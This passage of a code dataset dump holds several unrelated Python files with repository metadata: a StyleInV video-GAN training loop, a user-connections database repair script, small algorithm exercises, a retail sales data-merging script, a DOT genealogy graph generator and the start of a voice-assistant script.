SI_kwargs.mapping_opts.sampling.num_frames_per_video\n d_frames = loss_kwargs.real_sampling_cfg.num_frames_per_video\n Ts = torch.linspace(0, 1, steps=g_frames).view(g_frames, 1).unsqueeze(0).to(device)\n Ts = Ts.repeat([batch_gpu, 1, 1])\n \n # Generate initial frame\n wc = misc.print_module_summary(G.mapping, [zc, None])\n num_ws = wc.shape[1]\n img0 = misc.print_module_summary(G.synthesis, [wc])\n wc = wc[:, 0, :]\n \n # StyleInV output latents\n styles = misc.print_module_summary(SI, [img0, wc, zm, Ts, False, True, loss_kwargs.mutual_recon])\n if loss_kwargs.mutual_recon:\n styles = styles[0]\n styles_broadcast = styles.unsqueeze(1).repeat([1, num_ws, 1])\n \n # Map latents to images\n imgs = misc.print_module_summary(G.synthesis, [styles_broadcast])\n img_list = list(imgs.split(batch_gpu, dim=0))\n\n # process adversarial input\n if g_frames < d_frames:\n img_list = [img0] + img_list\n Ts = torch.cat([torch.zeros(batch_gpu, 1, 1).float().to(device), Ts], dim=1)\n elif g_frames > d_frames:\n img_list = img_list[1:]\n Ts = Ts[:, 1:]\n\n # Quintuplet sparse training discriminator\n if loss_kwargs.D_type == 'digan':\n img_D = torch.cat(img_list, dim=1)\n H, W = img_D.shape[2:]\n Ts = Ts.unsqueeze(-1)\n dTs = (Ts[:, 1:] - Ts[:, :-1]).repeat(1, 1, H, W)\n img_D = torch.cat([img_D, dTs], dim=1)\n misc.print_module_summary(D, [img_D, None])\n elif loss_kwargs.D_type in ['stylegan-v', 'ffc']:\n Ts = Ts.squeeze(-1)\n if loss_kwargs.D_type == 'ffc':\n Ts = Ts[:, 1:]\n img_D = torch.cat(img_list, dim=1)\n img_D = rearrange(img_D, 'b (t c) h w -> (b t) c h w', c=3)\n misc.print_module_summary(D, [img_D, Ts])\n\n # Setup augmentation.\n if rank == 0:\n print('Setting up augmentation...')\n\n if (augment_kwargs is not None) and (augment_p > 0 or ada_target is not None):\n augment_pipe = dnnlib.util.construct_class_by_name(**augment_kwargs).train().requires_grad_(False).to(device) # subclass of torch.nn.Module\n augment_pipe.p.copy_(torch.as_tensor(augment_p))\n\n if ada_target is not None:\n ada_stats = training_stats.Collector(regex='Loss/signs/real')\n else:\n ada_stats = None\n\n if resume_whole_state:\n misc.copy_params_and_buffers(resume_data['augment_pipe'], augment_pipe, require_all=False)\n else:\n augment_pipe = None\n ada_stats = None\n\n # Distribute across GPUs.\n if rank == 0:\n print(f'Distributing across {num_gpus} GPUs...')\n ddp_modules = dict()\n for name, module in [('G_mapping', G.mapping), ('G_synthesis', G.synthesis), ('SI', SI), (None, SI_ema), ('D', D), ('augment_pipe', augment_pipe)]:\n if (num_gpus > 1) and (module is not None) and len(list(module.parameters())) != 0:\n module.requires_grad_(True)\n module = torch.nn.parallel.DistributedDataParallel(module, device_ids=[device], broadcast_buffers=False)\n module.requires_grad_(False)\n if name is not None:\n ddp_modules[name] = module\n\n # Setup training phases.\n if rank == 0:\n print('Setting up training phases...')\n loss = dnnlib.util.construct_class_by_name(device=device, **ddp_modules, **loss_kwargs) # subclass of training.loss.Loss\n if rank == 0:\n print(f\"StyleInV loss: input_skip_to_D = {loss.input_skip_to_D}\")\n \n phases = []\n for name, module, opt_kwargs, reg_interval in [('SI', SI, SI_opt_kwargs, 0), ('D', D, D_opt_kwargs, D_reg_interval)]:\n if reg_interval is None:\n opt = dnnlib.util.construct_class_by_name(params=module.parameters(), **opt_kwargs) # subclass of torch.optim.Optimizer\n phases += [dnnlib.EasyDict(name=name+'both', module=module, opt=opt, interval=1)]\n else: # Lazy regularization.\n if reg_interval == 0:\n opt = dnnlib.util.construct_class_by_name(module.parameters(), **opt_kwargs) # subclass of torch.optim.Optimizer\n phases += [dnnlib.EasyDict(name=name+'main', module=module, opt=opt, interval=1)]\n else: \n mb_ratio = reg_interval / (reg_interval + 1)\n opt_kwargs = dnnlib.EasyDict(opt_kwargs)\n opt_kwargs.lr = opt_kwargs.lr * mb_ratio\n opt_kwargs.betas = [beta ** mb_ratio for beta in opt_kwargs.betas]\n opt = dnnlib.util.construct_class_by_name(module.parameters(), **opt_kwargs) # subclass of torch.optim.Optimizer\n phases += [dnnlib.EasyDict(name=name+'main', module=module, opt=opt, interval=1)]\n phases += [dnnlib.EasyDict(name=name+'reg', module=module, opt=opt, interval=reg_interval)]\n \n for phase in phases:\n phase.start_event = None\n phase.end_event = None\n if rank == 0:\n phase.start_event = torch.cuda.Event(enable_timing=True)\n phase.end_event = torch.cuda.Event(enable_timing=True)\n\n # Export sample images.\n grid_size = None\n grid_z = None\n grid_c = None\n if rank == 0:\n print('Exporting sample images and videos ...')\n grid_size, images = setup_snapshot_image_grid(training_set=training_set, random_seed=this_random_seed)\n save_image_grid(images, os.path.join(run_dir, 'reals.png'), drange=[0,255], grid_size=grid_size)\n real_videos = setup_snapshot_video_grid(training_set_kwargs=training_set_kwargs, grid_size=grid_size, random_seed=this_random_seed)\n torchvision.io.write_video(os.path.join(run_dir, 'reals.mp4'), real_videos, fps=visualize_args.fps, video_codec='h264', options={'crf': '10'})\n\n grid_batch = grid_size[0] * grid_size[1]\n grid_zc = torch.randn([grid_batch, content_dim], device=device)\n grid_zm = torch.randn([grid_batch, motion_dim], device=device) if require_motion_always else None\n grid_max_t_stamp = (visualize_args.viz_len - 1) * (1.0 / (training_set.nframes - 1))\n grid_Ts = torch.linspace(0, grid_max_t_stamp, steps=visualize_args.viz_len).view(visualize_args.viz_len, 1).unsqueeze(0).to(device)\n grid_wc = G.mapping(grid_zc, None)\n grid_num_ws = grid_wc.shape[1]\n grid_x = G.synthesis(grid_wc)\n grid_wc = grid_wc[:, 0, :]\n grid_args = dnnlib.EasyDict(grid_batch=grid_batch, grid_x=grid_x, grid_wc=grid_wc, grid_zm=grid_zm, grid_Ts=grid_Ts, grid_num_ws=grid_num_ws, noise_mode=noise_mode)\n\n grid_videos, grid_images = generate_visualize_videos(SI_ema, G.synthesis, **grid_args)\n grid_videos = ((grid_videos*0.5+0.5)*255).clamp(0,255).to(torch.uint8)\n grid_video_to_save = convert_batch_videos_to_grid(grid_videos, grid_size)\n\n if motion_type == 'acyclic_pe':\n grid_zm_same_motion = SI_ema.mapping.generate_motion_sequence(grid_Ts[0])\n grid_zm_same_motion = grid_zm_same_motion.repeat_interleave(grid_batch, dim=0)\n grid_args_same_motion = copy.deepcopy(grid_args)\n grid_args_same_motion.grid_zm = grid_zm_same_motion\n\n grid_videos_same_motion, _ = generate_visualize_videos(SI_ema, G.synthesis, **grid_args_same_motion)\n grid_videos_same_motion = ((grid_videos_same_motion*0.5+0.5)*255).clamp(0,255).to(torch.uint8)\n grid_videos_same_motion = convert_batch_videos_to_grid(grid_videos_same_motion, grid_size)\n\n pad_size = 64\n grid_pad = (torch.ones_like(grid_video_to_save[:, :, :pad_size, :]) * 255).to(torch.uint8)\n grid_video_to_save = torch.cat([\n grid_video_to_save,\n grid_pad, # Some padding between the videos\n grid_videos_same_motion,\n ], dim=2) # [video_len, h, w + pad_size + w, 3]\n\n save_image_grid(grid_images, os.path.join(run_dir, 'fakes_init.png'), drange=[-1,1], grid_size=(grid_size[0]*2, grid_size[1]))\n torchvision.io.write_video(os.path.join(run_dir, 'fake_init.mp4'), grid_video_to_save, fps=visualize_args.fps, video_codec='h264', options={'crf': '10'})\n\n # Initialize logs.\n if rank == 0:\n print('Initializing logs...')\n stats_collector = training_stats.Collector(regex='.*')\n stats_metrics = dict()\n stats_jsonl = None\n stats_tfevents = None\n if rank == 0:\n stats_jsonl = open(os.path.join(run_dir, 'stats.jsonl'), 'wt')\n try:\n import torch.utils.tensorboard as tensorboard\n stats_tfevents = tensorboard.SummaryWriter(run_dir)\n except ImportError as err:\n print('Skipping tfevents export:', err)\n\n # Train.\n if rank == 0:\n print(f'Training for {total_kimg} kimg...')\n print()\n cur_nimg = 0\n cur_tick = 0\n tick_start_nimg = cur_nimg\n tick_start_time = time.time()\n maintenance_time = tick_start_time - start_time\n batch_idx = 0\n if progress_fn is not None:\n progress_fn(0, total_kimg)\n while True:\n\n # Fetch training data.\n with torch.autograd.profiler.record_function('data_fetch'):\n # real_image\n batch_real_imgs, batch_real_ts = next(training_set_iterator)\n phase_real_imgs = batch_real_imgs.to(torch.float32).to(device) / 127.5 - 1 # [b (t c) h w]\n phase_real_imgs = phase_real_imgs.split(batch_gpu)\n phase_real_ts = batch_real_ts.unsqueeze(-1).to(device).to(torch.float32)\n phase_real_ts = phase_real_ts.split(batch_gpu)\n\n #real_t = real_t_delta.view(*real_t_delta.shape, 1, 1).repeat(1, 1, *phase_real_imgs.shape[-2:]).to(device).to(torch.float32)\n #phase_real_imgs = torch.cat([phase_real_imgs, real_t], dim=1).split(batch_gpu)\n\n # gen_z\n batch_tmp = batch_size // num_gpus\n all_gen_zc = torch.randn([len(phases) * batch_tmp, content_dim], device=device)\n all_gen_zc = [phase_gen_zc.split(batch_gpu) for phase_gen_zc in all_gen_zc.split(batch_tmp)]\n if require_motion_always:\n all_gen_zm = torch.randn([len(phases) * batch_tmp, motion_dim], device=device)\n all_gen_zm = [phase_gen_zm.split(batch_gpu) for phase_gen_zm in all_gen_zm.split(batch_tmp)]\n else:\n all_gen_zm = [[None] * (batch_size // batch_gpu) for _ in range(len(phases))]\n\n # Execute training phases.\n for phase, phase_gen_zc, phase_gen_zm in zip(phases, all_gen_zc, all_gen_zm):\n if batch_idx % phase.interval != 0:\n continue\n\n # Initialize gradient accumulation.\n if phase.start_event is not None:\n phase.start_event.record(torch.cuda.current_stream(device))\n phase.opt.zero_grad(set_to_none=True)\n phase.module.requires_grad_(True)\n\n # Accumulate gradients over multiple rounds.\n for round_idx, (real_img, real_ts, gen_zc, gen_zm) in enumerate(zip(phase_real_imgs, phase_real_ts, phase_gen_zc, phase_gen_zm)):\n sync = (round_idx == batch_size // (batch_gpu * num_gpus) - 1)\n gain = phase.interval\n loss.accumulate_gradients(phase=phase.name, real_imgs=real_img, real_ts=real_ts, gen_zc=gen_zc, gen_zm=gen_zm, sync=sync, gain=gain)\n\n # Update weights.\n phase.module.requires_grad_(False)\n with torch.autograd.profiler.record_function(phase.name + '_opt'):\n for param in phase.module.parameters():\n if param.grad is not None:\n misc.nan_to_num(param.grad, nan=0, posinf=1e5, neginf=-1e5, out=param.grad)\n phase.opt.step()\n if phase.end_event is not None:\n phase.end_event.record(torch.cuda.current_stream(device))\n \n # Update SI_ema\n ema_nimg = ema_kimg * 1000\n if ema_rampup is not None:\n ema_nimg = min(ema_nimg, cur_nimg * ema_rampup)\n ema_beta = 0.5 ** (batch_size / max(ema_nimg, 1e-8))\n for p_ema, p in zip(SI_ema.parameters(), SI.parameters()):\n p_ema.copy_(p.lerp(p_ema, ema_beta))\n for b_ema, b in zip(SI_ema.buffers(), SI.buffers()):\n b_ema.copy_(b)\n\n # Update state.\n cur_nimg += batch_size * loss.n_sparse\n batch_idx += 1\n\n # Execute ADA heuristic\n if (ada_stats is not None) and (batch_idx % ada_interval == 0):\n ada_stats.update()\n adjust = np.sign(ada_stats['Loss/signs/real'] - ada_target) * (batch_size * ada_interval) / (ada_kimg * 1000)\n augment_pipe.p.copy_((augment_pipe.p + adjust).max(misc.constant(0, device=device)))\n\n # Perform maintenance tasks once per tick.\n done = (cur_nimg >= total_kimg * 1000)\n if (not done) and (cur_tick != 0) and (cur_nimg < tick_start_nimg + kimg_per_tick * 1000):\n continue\n\n # Print status line, accumulating the same information in stats_collector.\n tick_end_time = time.time()\n fields = []\n fields += [f\"tick {training_stats.report0('Progress/tick', cur_tick):<5d}\"]\n fields += [f\"kimg {training_stats.report0('Progress/kimg', cur_nimg / 1e3):<8.1f}\"]\n fields += [f\"time {dnnlib.util.format_time(training_stats.report0('Timing/total_sec', tick_end_time - start_time)):<12s}\"]\n fields += [f\"sec/tick {training_stats.report0('Timing/sec_per_tick', tick_end_time - tick_start_time):<7.1f}\"]\n fields += [f\"sec/kimg {training_stats.report0('Timing/sec_per_kimg', (tick_end_time - tick_start_time) / (cur_nimg - tick_start_nimg) * 1e3):<7.2f}\"]\n fields += [f\"maintenance {training_stats.report0('Timing/maintenance_sec', maintenance_time):<6.1f}\"]\n fields += [f\"cpumem {training_stats.report0('Resources/cpu_mem_gb', psutil.Process(os.getpid()).memory_info().rss / 2**30):<6.2f}\"]\n fields += [f\"gpumem {training_stats.report0('Resources/peak_gpu_mem_gb', torch.cuda.max_memory_allocated(device) / 2**30):<6.2f}\"]\n fields += [f\"augment {training_stats.report0('Progress/augment', float(augment_pipe.p.cpu()) if augment_pipe is not None else 0):.3f}\"]\n torch.cuda.reset_peak_memory_stats()\n training_stats.report0('Timing/total_hours', (tick_end_time - start_time) / (60 * 60))\n training_stats.report0('Timing/total_days', (tick_end_time - start_time) / (24 * 60 * 60))\n if rank == 0:\n print(' '.join(fields))\n\n # Check for abort.\n if (not done) and (abort_fn is not None) and abort_fn():\n done = True\n if rank == 0:\n print()\n print('Aborting...')\n\n # Save image and video snapshot.\n if (rank == 0) and (image_snapshot_ticks is not None) and (done or cur_tick % image_snapshot_ticks == 0):\n grid_videos, grid_images = generate_visualize_videos(SI_ema, G.synthesis, **grid_args)\n save_image_grid(grid_images, os.path.join(run_dir, f'fakes{cur_nimg//1000:06d}.png'), drange=[-1,1], grid_size=(grid_size[0]*2, grid_size[1]))\n grid_videos = ((grid_videos*0.5+0.5)*255).clamp(0,255).to(torch.uint8)\n grid_video_to_save = convert_batch_videos_to_grid(grid_videos, grid_size)\n\n if motion_type == 'acyclic_pe':\n grid_zm_same_motion = SI_ema.mapping.generate_motion_sequence(grid_Ts[0])\n grid_zm_same_motion = grid_zm_same_motion.repeat_interleave(grid_batch, dim=0)\n grid_args_same_motion = copy.deepcopy(grid_args)\n grid_args_same_motion.grid_zm = grid_zm_same_motion\n grid_videos_same_motion, _ = generate_visualize_videos(SI_ema, G.synthesis, **grid_args_same_motion)\n grid_videos_same_motion = ((grid_videos_same_motion*0.5+0.5)*255).clamp(0,255).to(torch.uint8)\n grid_videos_same_motion = convert_batch_videos_to_grid(grid_videos_same_motion, grid_size)\n\n pad_size = 64\n grid_pad = (torch.ones_like(grid_video_to_save[:, :, :pad_size, :]) * 255).to(torch.uint8)\n grid_video_to_save = torch.cat([\n grid_video_to_save,\n grid_pad, # Some padding between the videos\n grid_videos_same_motion,\n ], dim=2) # [video_len, 3, h, w + pad_size + w]\n\n torchvision.io.write_video(os.path.join(run_dir, f'fake{cur_nimg//1000:06d}.mp4'), grid_video_to_save, fps=visualize_args.fps, video_codec='h264', options={'crf': '10'})\n\n # Save network snapshot.\n snapshot_pkl = None\n snapshot_data = None\n snapshot_modules = [\n ('G', G),\n ('D', D),\n ('SI', SI),\n ('SI_ema', SI_ema),\n ('augment_pipe', augment_pipe)\n ]\n if (network_snapshot_ticks is not None) and (done or cur_tick % network_snapshot_ticks == 0):\n snapshot_data = dict(training_set_kwargs=dict(training_set_kwargs))\n DDP_CONSISTENCY_IGNORE_REGEX = r'.*\\.(w_avg|latent_avg|embeds.*\\.weight|num_batches_tracked|running_mean|running_var)'\n for name, module in snapshot_modules:\n if module is not None:\n if num_gpus > 1:\n misc.check_ddp_consistency(module, ignore_regex=DDP_CONSISTENCY_IGNORE_REGEX)\n module = copy.deepcopy(module).eval().requires_grad_(False).cpu()\n snapshot_data[name] = module\n del module # conserve memory\n snapshot_pkl = os.path.join(run_dir, f'network-snapshot-{cur_nimg//1000:06d}.pkl')\n if rank == 0:\n with open(snapshot_pkl, 'wb') as f:\n pickle.dump(snapshot_data, f)\n\n # Evaluate metrics.\n if (snapshot_data is not None) and (len(metrics) > 0):\n if rank == 0:\n print('Evaluating metrics...')\n for metric in metrics:\n result_dict = metric_main.calc_metric(metric=metric, SI=snapshot_data['SI_ema'], SI_kwargs=SI_kwargs, G=snapshot_data['G'], \n G_kwargs={'noise_mode': noise_mode}, dataset_kwargs=training_set_kwargs, num_gpus=num_gpus, rank=rank, device=device)\n if rank == 0:\n metric_main.report_metric(result_dict, run_dir=run_dir, snapshot_pkl=snapshot_pkl)\n stats_metrics.update(result_dict.results)\n del snapshot_data # conserve memory\n\n # Collect statistics.\n for phase in phases:\n value = []\n if (phase.start_event is not None) and (phase.end_event is not None):\n phase.end_event.synchronize()\n value = phase.start_event.elapsed_time(phase.end_event)\n training_stats.report0('Timing/' + phase.name, value)\n stats_collector.update()\n stats_dict = stats_collector.as_dict()\n\n # Update logs.\n timestamp = time.time()\n if stats_jsonl is not None:\n fields = dict(stats_dict, timestamp=timestamp)\n stats_jsonl.write(json.dumps(fields) + '\\n')\n stats_jsonl.flush()\n if stats_tfevents is not None:\n global_step = int(cur_nimg / 1e3)\n walltime = timestamp - start_time\n for name, value in stats_dict.items():\n stats_tfevents.add_scalar(name, value.mean, global_step=global_step, walltime=walltime)\n for name, value in stats_metrics.items():\n stats_tfevents.add_scalar(f'Metrics/{name}', value, global_step=global_step, walltime=walltime)\n stats_tfevents.flush()\n if progress_fn is not None:\n progress_fn(cur_nimg // 1000, total_kimg)\n\n # Update state.\n cur_tick += 1\n tick_start_nimg = cur_nimg\n tick_start_time = time.time()\n maintenance_time = tick_start_time - tick_end_time\n if done:\n break\n\n # Done.\n if rank == 0:\n print()\n print('Exiting...')\n\n#----------------------------------------------------------------------------\n","repo_name":"johannwyh/StyleInV","sub_path":"training/training_loop_styleinv.py","file_name":"training_loop_styleinv.py","file_ext":"py","file_size_in_byte":30579,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"37"} +{"seq_id":"74165382187","text":"from tapiriik.database import db\nfrom tapiriik.settings import _GLOBAL_LOGGER, COLOG\n\n# We go through all users in database.\nusers = db.users.find()\nfor user in users :\n\n # We retreive user connected services.\n usr_connected_services = user['ConnectedServices']\n\n # Then we retreive the names of those user connected services.\n usr_connected_services_names = [service['Service'] for service in usr_connected_services]\n\n # We now get the connections attached to the user thanks to their IDs.\n usr_connections = [user_connection for user_connection in db.connections.find({\n \"_id\": {\n \"$in\": [usr_connected_service[\"ID\"] for usr_connected_service in usr_connected_services]\n }\n })]\n\n # Then we get their names.\n usr_connections_names = [service['Service'] for service in usr_connections]\n\n # To determine the \"lost services\" we make a XOR to exclude the connections that are both present\n # in th user connected services and in the connections.\n usr_lost_svc = [service_name for service_name in list(set(usr_connected_services_names) ^ set(usr_connections_names))]\n\n # We check if there is at least one lost service to avoid overprocessing and rewriting users that don't need it.\n if len(usr_lost_svc) != 0:\n _GLOBAL_LOGGER.info(\"Impacted USER : \"+COLOG.blue(user))\n _GLOBAL_LOGGER.info(\"User connected services : \\t\"+COLOG.cyan(usr_connected_services_names))\n _GLOBAL_LOGGER.info(\"User connections names : \\t\"+COLOG.magenta(usr_connections_names))\n _GLOBAL_LOGGER.info(\"User lost services : \\t\\t\"+COLOG.red(usr_lost_svc))\n _GLOBAL_LOGGER.info(COLOG.yellow(\"-----------------Creating new connected service object-----------------\"))\n # We recreate an user connected services object with the services that are really connected.\n new_usr_connected_services = [\n {\n \"Service\": usr_connection['Service'], \n \"ID\":usr_connection[\"_id\"]\n } for usr_connection in usr_connections\n ]\n\n _GLOBAL_LOGGER.info(usr_connections_names)\n\n _GLOBAL_LOGGER.info(\"Actual user connected service in db : \\t\"+COLOG.cyan(usr_connected_services))\n _GLOBAL_LOGGER.info(\"The new one shall look like this : \\t\"+COLOG.magenta(new_usr_connected_services))\n _GLOBAL_LOGGER.info(COLOG.yellow(\"-----------------Replacing user connected service by the real ones-----------------\"))\n # As mentioned by the logs, we replace the connected services array by the new processed ones.\n user['ConnectedServices'] = new_usr_connected_services\n _GLOBAL_LOGGER.info(\"User with new connected services : \"+COLOG.blue(user))\n # We replace the actual user by a recreating one with good services.\n db.users.update_one({\"_id\": user[\"_id\"]},{\"$set\":user})\n","repo_name":"kevforget/hub-decathlon-debug","sub_path":"fix_connections.py","file_name":"fix_connections.py","file_ext":"py","file_size_in_byte":2838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18440219982","text":"def FindPolindrom(num):\n\n if 1 <= num // 10**4 <= 9:\n list = []\n while num != 0:\n list.append(num % 10)\n num //= 10\n if list[0] == list[4] and list[1] == list[3]:\n return print(\"Да! Это полиндром\")\n else:\n return print(\"Нет, это не полиндром\")\n\nFindPolindrom(int(input(\"Введите пятизначное число: \")))","repo_name":"DmitriyPyanzin/HomeWork","sub_path":"01._Introduction_to_programming_languages/Lesson_3._Arrays_and_Functions_in_Programming/main_tasks/Task19/Python/Task19.py","file_name":"Task19.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41814775826","text":"class Visualizer:\n\t\"\"\"\n\tClass for generating DOT-files to answer the search queries.\n\t\"\"\"\n\tdef __init__(self, connector, details):\n\t\tself.connection = connector[0]\n\t\tself.cursor = connector[1]\n\n\t\tself.noDetails = details\n\n\n\tdef createNodeStr(self, color, id):\n\t\t# Get name\n\t\tself.cursor.execute(\"SELECT name FROM person WHERE pID=?\", (id,))\n\t\trow = self.cursor.fetchone()\n\t\tname = row[\"name\"]\n\t\tname = name.replace(\"\\\"\",\"\\'\")\n\n\t\t# Get dissertation, university and year\n\t\t# Only information of one dissertation will be printed\n\t\tself.cursor.execute(\"SELECT university, year FROM dissertation WHERE author=?\", (id,))\n\t\trow = self.cursor.fetchone()\n\t\tuni = row[\"university\"]\n\t\tyear = row[\"year\"]\n\n\t\t# Merge everything to a string and add to DOT-file\n\t\tif self.noDetails:\n\t\t\tnodeStr = u\" {} [label=\\\"{} ({})\\\", fontcolor={}, URL=\\\"http://www.google.com/#q={}\\\"];\"\\\n\t\t\t.format(id, name, year, color, name).encode('utf-8')\n\n\t\telse:\n\t\t\tnodeStr = u\" {} [label=\\\"{} \\\\n{} {}\\\", fontcolor={}, URL=\\\"http://www.google.com/#q={}\\\"];\"\\\n\t\t\t.format(id, name, uni, year, color, name).encode('utf-8')\n\n\t\treturn nodeStr\n\n\n\tdef createEdgeStr(self, color, id, blackSet, redSet):\n\t\t# Get relationship and store it to add it at the end of the\n\t\t# DOT-file when exiting this loop.\n\t\tself.cursor.execute(\"SELECT author FROM advised, dissertation WHERE student=dID AND advisor=?\", (id,))\n\t\tstudents = self.cursor.fetchall()\n\n\t\tedges = \"\"\n\n\t\tfor student in students:\n\t\t\tif redSet is not None and student[\"author\"] in redSet:\n\t\t\t\tedgeStr = u\"\\n {} -> {} [color={}];\".format(id, student[\"author\"], color).encode('utf-8')\n\t\t\t\tedges += edgeStr\n\n\t\t\telif blackSet is not None and student[\"author\"] in blackSet:\n\t\t\t\tedgeStr = u\"\\n {} -> {} [color=black];\".format(id, student[\"author\"]).encode('utf-8')\n\t\t\t\tedges += edgeStr\n\n\t\treturn edges\n\n\n\tdef generateDotFile(self, blackSet, redSet=None):\n\t\tedges = \"\"\n\t\tdotFile = \"\"\n\t\tdotFile += \"\"\"digraph genealogy {\n\tgraph [charset=\"utf-8\"];\n\tnode [shape=plaintext];\n\tedge [style=bold];\\n\\n\"\"\"\n\n\t\tif blackSet is not None:\n\t\t\tfor id in blackSet:\n\t\t\t\tdotFile += self.createNodeStr(\"black\", id)\n\t\t\t\tedge = self.createEdgeStr(\"black\", id, blackSet, redSet)\n\n\t\t\t\tif edge != \"\":\n\t\t\t\t\tedges += edge\n\n\t\t\t\tdotFile += \"\\n\"\n\n\t\tif redSet is not None:\n\t\t\tfor id in redSet:\n\t\t\t\tdotFile += self.createNodeStr(\"red\", id)\n\t\t\t\tedge = self.createEdgeStr(\"red\", id, blackSet, redSet)\n\n\t\t\t\tif edge != \"\":\n\t\t\t\t\tedges += edge\n\n\t\t\t\tdotFile += \"\\n\"\n\n\t\t# Now print the connections between the nodes.\n\t\tdotFile += edges\n\t\tdotFile += \"\\n}\\n\"\n\n\t\treturn dotFile\n","repo_name":"justjulian/math-genealogy-db","sub_path":"visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":2551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4740695423","text":"\"\"\"\nAn image is represented by a 2-D array of integers,\neach integer representing the pixel value of the image (from 0 to 65535).\n\nGiven a coordinate (sr, sc) representing the starting pixel\n(row and column) of the flood fill, and a pixel value newColor,\n\"flood fill\" the image.\n\nTo perform a \"flood fill\", consider the starting pixel, plus any\npixels connected 4-directionally to the starting pixel of the same color\nas the starting pixel, plus any pixels connected 4-directionally to those\npixels (also with the same color as the starting pixel), and so on. Replace\nthe color of all of the aforementioned pixels with the newColor.\n\nAt the end, return the modified image.\n\"\"\"\nfrom typing import List\n\ndef fill(image, row, col, new_color, old_color):\n if row < 0 or col < 0 or row >= len(image) or col >= len(image[0]):\n return\n if image[row][col] != old_color:\n return\n image[row][col] = new_color\n fill(image, row + 1, col, new_color, old_color)\n fill(image, row - 1, col, new_color, old_color)\n fill(image, row , col + 1, new_color, old_color)\n fill(image, row , col - 1, new_color, old_color)\n\ndef floodFill(image: List[List[int]], sr: int, sc: int, newColor: int) -> List[List[int]]:\n if image[sr][sc]==newColor:\n return image\n fill(image, sr, sc, newColor, image[sr][sc])\n return image\n\nprint(floodFill([[0,0,0],[0,1,0]],1,1,1))\n","repo_name":"vyshuks/may-leetcoding-challenge","sub_path":"flood_fill.py","file_name":"flood_fill.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27780074827","text":"#Given the head of a singly linked list, reverse the list, and return the reversed list.\n\n# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\n\nclass Solution(object):\n def reverseList(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n \"\"\"\n #intializing two pointers curr and head\n curr = head\n prev = None\n while curr: #looping until curr becomes None\n temp = curr.next #temporarily storing the link to the next node before breaking it\n curr.next = prev#reversing the direction\n #updating pointers for next iteration\n prev = curr \n curr = temp\n return prev \n#returning prev since it'll be the last node of the linked list which becomes first node of the reversed linked list \n","repo_name":"ronnitburman/Leet_Code_Problems","sub_path":"LeetCode_206_Reverse_Linked_List.py","file_name":"LeetCode_206_Reverse_Linked_List.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21131519153","text":"import numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\nimport time\n\ndf_train = pd.read_csv('train_2017-06-15_to_2017-08-15.csv')\n#df_test = pd.read_csv('../data/test.csv')\n#df_sample = pd.read_csv('../data/sample_submission.csv')\ndf_stores = pd.read_csv('../data/stores.csv')\ndf_items = pd.read_csv('../data/items.csv')\ndf_transactions = pd.read_csv('../data/transactions.csv')\ndf_oil = pd.read_csv('../data/oil.csv')\ndf_holidays_events = pd.read_csv('../data/holidays_events.csv')\n\ndf_stores['stype'] = df_stores['type']\ndf_stores = df_stores.drop(['type'],axis=1)\n\ndict_family = {k: v for v,k in enumerate(df_items.family.unique()) }\ndict_city = {k: v for v,k in enumerate(df_stores.city.unique()) }\ndict_state = {k: v for v,k in enumerate(df_stores.state.unique()) }\ndict_stype = {k: v for v,k in enumerate(np.sort(df_stores.stype.unique())) }\ndict_type = {k: v for v,k in enumerate(df_holidays_events.type.unique()) }\ndict_holidays = {k: v for v,k in enumerate(df_holidays_events.description.unique()) }\ndict_locale = {k: v for v,k in enumerate(df_holidays_events.locale.unique()) }\ndict_locale_name = {k: v for v,k in enumerate(df_holidays_events.locale_name.unique()) }\n\nprint('-------- train --------')\nprint(df_train.head(5))\n\n\nprint('-------- stores --------')\nprint(df_stores.head(5))\n\nprint('-------- items --------')\nprint(df_items.head(5))\n\nprint('-------- transactions --------')\nprint(df_transactions.head(5))\n\nprint('-------- oil --------')\nprint(df_oil.head(5))\n\nprint('-------- holidays and events --------')\nprint(df_holidays_events.head(5))\n\n# map names to numbers by dictionaries\ndf_items = df_items.replace({'family':dict_family})\ndf_stores = df_stores.replace({'city':dict_city, 'state':dict_state, 'stype':dict_stype})\ndf_holidays_events = df_holidays_events.replace({'type':dict_type,'locale':dict_locale,'locale_name':dict_locale_name,'description':dict_holidays})\n\nstart_time = time.time()\n\ngrouped = df_train.groupby('date')\ndf_combine_list = []\nfor date, group in grouped:\n #print('merging date ',date)\n group = pd.merge(group, df_transactions, on=['date','store_nbr'], how='left')\n group = pd.merge(group, df_oil, on='date', how='left')\n group = pd.merge(group, df_holidays_events, on='date', how='left')\n group = pd.merge(group, df_items, on='item_nbr', how='left')\n group = pd.merge(group, df_stores, on='store_nbr', how='left')\n df_combine_list.append(group)\n\ndf_combine = pd.concat(df_combine_list, axis=0)\nelapsed_time = time.time() - start_time\nprint('Used time on merging: ', elapsed_time)\n\nprint('-------- combined data --------')\nprint(df_combine.head(10))\n\noutname='combine_data_2017-06-15_to_2017-08-15.csv'\ndf_combine.to_csv(outname,header=True,index=False,mode='w')\n","repo_name":"bingchuhuang/kaggle-CorpFavorita","sub_path":"data_preprocess/show_feature.py","file_name":"show_feature.py","file_ext":"py","file_size_in_byte":2783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40951735056","text":"#This is main file, each files will be controlled form here\nimport speech\nimport sites\nimport newsreader\nimport audio\nimport wikidata\nimport sendmail\nimport osmodule\naudio.speak(\"Hello! welcome to the world of AI. I am professor, How may i help you??\") #calling audio.py file\n#audio.speak(\"હેલો હું ચુ પ્રોફેસર મની હેઇસ્ટ થી વાત કરું છું\")\naudio.speak(\"kem chho! 